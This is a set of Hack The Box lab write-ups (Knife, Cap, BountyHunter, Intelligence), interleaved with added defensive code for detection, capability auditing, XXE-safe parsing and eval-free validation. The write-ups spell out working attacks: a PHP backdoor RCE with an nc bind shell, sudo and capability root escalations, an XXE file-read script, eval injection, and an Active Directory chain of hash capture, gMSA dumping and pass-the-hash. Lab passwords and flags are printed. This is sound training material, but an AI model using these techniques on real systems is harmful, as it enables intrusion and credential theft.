HTB_Set_2

Updated whenever I feel like it.

Knife

Port scan

nmap -sV -Pn -T5 10.10.10.242

Nmap scan report for 10.10.10.242
Host is up (0.36s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

Get the PHP version

curl -I http://10.10.10.242/

HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 05:54:34 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

Search for a related exploit

searchsploit php 8.1 dev

----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Bind a shell on port 9876 of the target and connect to it with nc

curl -H "User-Agentt: zerodiumsystem('mkfifo /tmp/bufferfly; cat /tmp/bufferfly | /bin/bash -i 2>&1 | nc -l 9876 > /tmp/bufferfly');" http://10.10.10.242/
nc 10.10.10.242 9876

cat /home/james/user.txt

71a8b414816d223319c095a64edbae6c
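A defender-side check for the backdoor trigger used above. This is an added example, not code from the writeup or from the exploit it references; the sample requests and response are constructed, and `inspect_request`/`inspect_response` are names chosen here. It flags requests carrying the non-standard `User-Agentt` header (and the `zerodium` prefix the backdoor keys on) and responses whose `X-Powered-By` banner advertises the PHP/8.1.0-dev build.

```python
# Detect the PHP 8.1.0-dev "User-Agentt" backdoor trigger in raw HTTP traffic.
# Added example; the sample messages below are constructed, not captured from the box.

def parse_http_message(raw):
    """Split a raw HTTP request or response into (start line, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def inspect_request(raw):
    """Return a list of findings for one raw HTTP request (empty list = nothing suspicious)."""
    _, headers = parse_http_message(raw)
    findings = []
    value = headers.get("user-agentt")      # note the double 't': this is not a real header
    if value is not None:
        findings.append("non-standard User-Agentt header present (PHP 8.1.0-dev backdoor trigger)")
        if value.startswith("zerodium"):
            findings.append("zerodium prefix: the text after it is run as PHP on a backdoored build")
    return findings


def inspect_response(raw):
    """Flag a server banner advertising the PHP/8.1.0-dev build the backdoor shipped in."""
    _, headers = parse_http_message(raw)
    if headers.get("x-powered-by", "").startswith("PHP/8.1.0-dev"):
        return ["X-Powered-By advertises PHP/8.1.0-dev: verify the build, it may carry the backdoor"]
    return []


# Constructed samples (not from the page's traffic)
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: web.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: web.example\r\nUser-Agentt: zerodiumecho 'probe';\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: web.example\r\nuser-agentt: Mozilla/5.0\r\n\r\n",
]
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n"
)

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req.split("\r\n")[0], "->", inspect_request(req) or "clean")
    print("response ->", inspect_response(SAMPLE_RESPONSE) or "clean")
```

Apache's default combined LogFormat does not record this header, so the request check has to run in a reverse proxy or IDS, or the LogFormat has to be extended with `%{User-Agentt}i` first. The actual fix is to replace the affected PHP build; the banner check only tells you which hosts to look at.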

Privilege escalation

Check sudo permissions

sudo -l

Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife

sudo -u root knife exec --exec "exec '/bin/bash -i'"

cat /root/root.txt

6fa9527622b5b0396511a575bd529b42

Cap

Port scan

nmap -sV -Pn -T5 10.10.10.245

Nmap scan report for 10.10.10.245
Host is up (0.28s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Exploitation

Download the packet capture

curl -O http://10.10.10.245/download/0
wireshark 0

FTP login credentials recovered from the capture:
nathan:Buck3tH4TF0RM3!

ssh nathan@10.10.10.245
Buck3tH4TF0RM3!

cat /home/nathan/user.txt

f514ef062a27e672c5e88001061d8c5a

Privilege escalation

Check file capabilities

getcap /* -r 2>/dev/null

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Escalate privileges with python

/usr/bin/python3.8 -c 'import os;os.setuid(0);os.system("/bin/bash")'
cat /root/root.txt

64941cc0edb38d723f72d34453780c90
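An audit script for the `getcap` output above, written from the defender's side. This is an added example and not part of the writeup; `audit_capabilities` and `RISKY_CAPS` are names chosen here, and the sample lines reproduce the getcap output shown in this section. It parses both the older `path = caps+flags` form and the newer `path caps=flags` form of getcap output and reports binaries whose effective or permitted set contains a capability that amounts to root.

```python
# Audit getcap output for capabilities that let a binary escalate to root.
# Added example, not from the writeup. SAMPLE_GETCAP reproduces the output shown above.

# Capabilities that amount to root when granted to an interpreter or to a binary
# whose input the user controls (cap_setuid on python3.8 is the case above).
RISKY_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner", "cap_setfcap",
}


def parse_getcap_line(line):
    """Parse one getcap line into (path, {capability: flags}).

    Handles the older 'path = cap_a,cap_b+eip' form and the newer 'path cap_a,cap_b=eip' form.
    """
    line = line.strip()
    if " = " in line:
        path, capstr = line.split(" = ", 1)
    else:
        path, _, capstr = line.partition(" ")
    grants = {}
    for token in capstr.split():                       # one token per flag group
        names, _, flags = token.replace("=", "+").partition("+")
        for cap in names.split(","):
            if cap:
                grants[cap] = flags
    return path, grants


def audit_capabilities(lines):
    """Return [(path, [risky caps])] for entries whose risky caps are effective or permitted."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        path, grants = parse_getcap_line(line)
        risky = sorted(
            cap for cap, flags in grants.items()
            if cap in RISKY_CAPS and ("e" in flags or "p" in flags)
        )
        if risky:
            findings.append((path, risky))
    return findings


# getcap output as shown in the writeup above
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
""".splitlines()

if __name__ == "__main__":
    for path, caps in audit_capabilities(SAMPLE_GETCAP):
        # Remediation is to drop the file capability: setcap -r <path>
        print(f"{path}: {', '.join(caps)}  -> setcap -r {path}")
```

Run it over `getcap -r / 2>/dev/null` on a host you administer; the only hit in the sample is `/usr/bin/python3.8` with `cap_setuid`, which is exactly the entry abused above. `cap_net_raw` on ping is normal and is not reported.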

BountyHunter

Port scan

nmap -sV -Pn -T5  10.10.11.100

Nmap scan report for 10.10.11.100
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory scan

dirb http://10.10.11.100/ -X .php

+ http://10.10.11.100/db.php (CODE:200|SIZE:0)

Exploitation

import base64
import re
import requests

req = requests.session()
file = input()
payload = {"data":base64.b64encode(("""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=""" + file + """\">]>
<bugreport>
<title>&xxe;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>""").encode()).decode()}
url = "http://10.10.11.100/tracker_diRbPr00f314.php"
res=req.post(url=url, data=payload)
data = res.text
data = data.replace("\n", "")
result = base64.b64decode(re.findall("<td>Title:</td> <td>(.*?)</td>", data)[0].encode()).decode()
print(result)

Read /etc/passwd

development:x:1000:1000:Development:/home/development:/bin/bash

Read db.php

<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
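The XXE above works because the tracker expands a `SYSTEM` entity declared in the DOCTYPE. The following is an added example of how a parser for the same `<bugreport>` document can refuse that outright; it is not the tracker's own code (the PHP backend behind `tracker_diRbPr00f314.php` is not shown on the page), and `parse_bugreport`, `UnsafeXML` and `rejects` are names chosen here. It uses only the standard-library expat bindings and aborts at the first DOCTYPE or entity declaration.

```python
# A DTD-free parser for the <bugreport> document the tracker accepts.
# Added example, not the tracker's own code. Both sample documents are constructed.
import xml.parsers.expat as expat

FIELDS = ("title", "cwe", "cvss", "reward")


class UnsafeXML(Exception):
    """Raised when the document declares a DTD or entities (the XXE vector above)."""


def parse_bugreport(xml_text):
    """Return {field: text} for a <bugreport>, refusing any DOCTYPE or entity declaration."""
    fields = {}
    buf = []
    parser = expat.ParserCreate()

    # Hard stop at the first sign of a DTD: the bug-report format never needs one.
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE is not allowed in bug reports")

    def reject_entity(*args):
        raise UnsafeXML("entity declarations are not allowed in bug reports")

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    # Belt and braces: returning 0 makes expat abort if an external entity is ever referenced
    parser.ExternalEntityRefHandler = lambda *args: 0
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def start_element(name, attrs):
        buf.clear()

    def char_data(data):
        buf.append(data)          # expat may deliver one text node in several chunks

    def end_element(name):
        if name in FIELDS:
            fields[name] = "".join(buf).strip()

    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element
    parser.Parse(xml_text, True)

    missing = [f for f in FIELDS if f not in fields]
    if missing:
        raise ValueError(f"bug report is missing fields: {missing}")
    return fields


def rejects(xml_text):
    """True if parse_bugreport refuses the document as unsafe."""
    try:
        parse_bugreport(xml_text)
    except UnsafeXML:
        return True
    return False


# Constructed benign report
SAFE_REPORT = """<?xml version="1.0" encoding="ISO-8859-1"?>
<bugreport>
<title>Stored XSS in comments</title>
<cwe>79</cwe>
<cvss>6.1</cvss>
<reward>500</reward>
</bugreport>"""

# Same shape as the payload above, with a placeholder resource instead of a real file
XXE_REPORT = """<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///PLACEHOLDER">]>
<bugreport>
<title>&xxe;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>"""

if __name__ == "__main__":
    print(parse_bugreport(SAFE_REPORT))
    print("XXE document rejected:", rejects(XXE_REPORT))
```

Rejecting the DOCTYPE covers both external entities (the file read above) and internal-entity expansion attacks, which is why it is preferable to merely disabling external entity resolution. The same rule applies to PHP: `libxml_disable_entity_loader()` (or, on PHP 8, the default) stops the file read, but refusing any DTD is the cleaner contract for a format that never needs one.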

Log in over SSH

ssh development@10.10.11.100
m19RoAU0hP41A1sTsq6K

cat /home/development/user.txt

96248cc10e05f03e3b63eb59adfd9d4c

Privilege escalation

cat /home/development/contract.txt

Hey team,

I'll be out of the office this week but please make sure that our contract with Skytrain Inc gets completed.

This has been our first job since the "rm -rf" incident and we can't mess this up. Whenever one of you gets on please have a look at the internal tool they sent over. There have been a handful of tickets submitted that have been failing validation and I need you to figure out why.

I set up the permissions for you to test this. Good luck.

-- John

Check sudo permissions

sudo -l

Matching Defaults entries for development on bountyhunter:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User development may run the following commands on bountyhunter:
(root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

Inspect the Python script

cat /opt/skytrain_inc/ticketValidator.py
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

The eval() call on the ticket code line can be used to execute commands.
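The fix on the defender's side is to parse the ticket code instead of evaluating it. The following is an added example, not part of the writeup or of the original `ticketValidator.py`; `evaluate_ticket`, `safe_sum` and `validate_file` are names chosen here. It keeps the original rules (first number `% 7 == 4`, sum greater than 100) but only accepts digits joined by `+`, so the injected line used below is rejected rather than executed.

```python
# Ticket validation without eval(): same rules as ticketValidator.py, but the ticket code
# is matched against a strict pattern and summed as integers. Added example; the function
# names are chosen here, not taken from the original script.
import re

# Exactly what a ticket code may look like: digits joined by '+', wrapped in **...**
CODE_RE = re.compile(r"^\*\*(\d+(?:\+\d+)*)\*\*$")


def safe_sum(expr):
    """Sum an expression that has already matched CODE_RE; no code is ever executed."""
    return sum(int(n) for n in expr.split("+"))


def evaluate_ticket(lines):
    """Apply the ticket rules to a list of lines; any malformed code line is rejected."""
    code_line = None
    for i, raw in enumerate(lines):
        x = raw.rstrip("\r\n")
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line is not None and i == code_line:
            match = CODE_RE.match(x)
            if not match:                     # where the original handed the line to eval()
                return False
            expr = match.group(1)
            if int(expr.split("+")[0]) % 7 != 4:
                return False
            return safe_sum(expr) > 100
    return False


def validate_file(path):
    """Same file-type rule as the original, returning True/False instead of printing."""
    if not path.endswith(".md"):
        return False
    with open(path, "r") as fh:
        return evaluate_ticket(fh.readlines())


# Constructed tickets
VALID_TICKET = [
    "# Skytrain Inc\n", "## Ticket to Bridgeport\n", "__Ticket Code:__\n", "**11+100**\n",
    "##Issued: 2021/06/21\n", "#End Ticket\n",
]
# Same code line as the /tmp/1.md used below: not digits and '+', so it never reaches eval
INJECTED_TICKET = [
    "# Skytrain Inc\n", "## Ticket to Bridgeport\n", "__Ticket Code:__\n",
    "**11+eval(\"__import__('os').system('/bin/bash')\")**\n", "##Issued: 2021/06/21\n",
]

if __name__ == "__main__":
    print("valid ticket:", evaluate_ticket(VALID_TICKET))
    print("injected ticket:", evaluate_ticket(INJECTED_TICKET))
```

Even with eval() gone, a script that runs as root through `NOPASSWD` sudo should not take a user-controlled path at all; the sudo rule is the second half of the problem.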

Craft a malicious ticket file

cat /tmp/1.md

# Skytrain Inc
## Ticket to Bridgeport
__Ticket Code:__
**11+eval("__import__('os').system('/bin/bash')")**
##Issued: 2021/06/21
#End Ticket

Escalate

sudo -u root /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
/tmp/1.md

cat /root/root.txt

d8b513ba7130a46641d2c65966f6b8e6

Intelligence

Port scan

nmap -sV -sT -Pn 10.10.10.248

Nmap scan report for 10.10.10.248
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-18 12:54:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Browsing to port 80, the home page links to two PDFs.

Try enumerating other PDFs by date

#pdf.py
# Request /documents/YYYY-MM-DD-upload.pdf for every date in 2020-2022 and save each file that exists
import requests
req = requests.session()
for i in range(3):
    for j in range(1, 13):
        for k in range(1, 32):  # days 1..31 (the original loop ran 0..30 and skipped the 31st)
            year = str(2020 + i)
            month = ("0" + str(j)) if len(str(j)) == 1 else str(j)
            day = ("0" + str(k)) if len(str(k)) == 1 else str(k)
            url = "http://10.10.10.248/documents/" + year + "-" + month + "-" + day + "-upload.pdf"
            res = req.get(url)
            if res.status_code == 200:
                filename = year + "-" + month + "-" + day + "-upload.pdf"
                print(filename)
                with open(filename, "wb") as file:  # close the handle after writing
                    file.write(res.content)

Extract usernames from the PDF metadata

#!/bin/bash
#pdf.sh
# Pull the Creator field out of every PDF's metadata (exiftool prints "Creator : Name",
# so the third whitespace-separated field is the name) and collect the names in ./user
for f in *.pdf; do
    exiftool "$f" | grep Creator | awk '{print $3}' >> user
done

2020-06-04-upload.pdf contains a password: NewIntelligenceCorpUser9876
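The usernames above came from the Creator field that the document tooling wrote into every PDF. The following is an added pre-publish check, not part of the writeup; `find_identifying_metadata`, `looks_like_username` and `check_pdf` are names chosen here and the sample PDF is constructed. It scans the raw file for string-valued Info-dictionary keys and flags values that look like account names, so a file is caught before it lands in a public `/documents/` directory.

```python
# Pre-publish check for identifying metadata in PDFs (the Creator field that leaked users above).
# Added example, not from the writeup. It regexes the raw bytes, so it only sees an Info
# dictionary that is stored uncompressed; exiftool remains the authoritative check.
import re

# /Key (literal string) pairs for the Info-dictionary keys that usually carry identity data.
# Literal strings with nested parentheses are not handled by this simple pattern.
INFO_RE = re.compile(rb"/(Author|Creator|Producer|Title|Subject)\s*\(([^()]*)\)")


def find_identifying_metadata(pdf_bytes):
    """Return {key: value} for any Info-dictionary string fields found in the raw PDF."""
    return {key.decode(): value.decode("latin-1") for key, value in INFO_RE.findall(pdf_bytes)}


def looks_like_username(value):
    """Heuristic for the First.Last account names that the enumerated PDFs leaked."""
    return re.fullmatch(r"[A-Za-z]+\.[A-Za-z]+", value) is not None


def check_pdf(pdf_bytes):
    """Return [(key, value)] for metadata values that look like account names."""
    return [
        (key, value)
        for key, value in find_identifying_metadata(pdf_bytes).items()
        if looks_like_username(value)
    ]


# Constructed minimal PDF with an uncompressed Info dictionary
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
3 0 obj << /Creator (Jane.Doe) /Producer (Constructed Sample) /Title (Internal Memo) >> endobj
trailer << /Root 1 0 R /Info 3 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for key, value in check_pdf(SAMPLE_PDF):
        print(f"{key} = {value!r} looks like an account name; strip metadata before publishing")
```

Treat an empty result as "nothing found in plain text", not as "clean": PDFs that store the Info dictionary inside a compressed object stream need a real parser or exiftool. A positive hit should be fixed by regenerating or stripping the metadata and re-checking, and the fact that the values are account names is itself the finding: document tooling that stamps the login name into every export turns a public file share into a username list.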

Brute-force SMB

crackmapexec smb 10.10.10.248 -d intelligence -u user -p NewIntelligenceCorpUser9876

SMB 10.10.10.248 445 DC [+] intelligence\Tiffany.Molina:NewIntelligenceCorpUser9876

List SMB shares

smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY

Get user.txt

smbclient //10.10.10.248/users -U Tiffany.Molina NewIntelligenceCorpUser9876
cd Tiffany.Molina\Desktop\
get user.txt

cat user.txt

bbfd0948d53d769c6ec2fcc02181fa7b

Privilege escalation

Retrieve the PowerShell script

smbclient //10.10.10.248/IT -U Tiffany.Molina NewIntelligenceCorpUser9876
get downdetector.ps1

cat downdetector.ps1

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if(.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

Spoof a DNS name

wget https://raw.githubusercontent.com/dirkjanm/krbrelayx/master/dnstool.py
python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p NewIntelligenceCorpUser9876 --action add -r webbufferfly.intelligence.htb -d 10.10.16.24 10.10.10.248

Capture the account hash

responder -I tun0 -A

Ted.Graves::intelligence:a0ccbece497d44d

Crack the hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Mr.Teddy (Ted.Graves)

Credentials obtained:
Ted.Graves:Mr.Teddy

Get the gMSA hash

wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248

svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7

Get the SPN

git clone https://github.com/the-useless-one/pywerview
python3 pywerview.py get-netcomputer -u svc_int$ --hashes 47e89a6afd68e3872ef1acaf91d0b2f7 -d intelligence.htb -t dc.intelligence.htb --full-data

msds-allowedtodelegateto: WWW/dc.intelligence.htb

Get a service ticket (ST)

python3 getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
export KRB5CCNAME=administrator.ccache
python3 secretsdump.py -k dc.intelligence.htb -just-dc

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3:::

Log in with the hash

evil-winrm -i 10.10.10.248 -u administrator -H 9075113fe16cf74f7c0f9b27e882dad3
type c:\users\administrator\desktop\root.txt

0c6b9779d283e244e79b11c78fc1fb92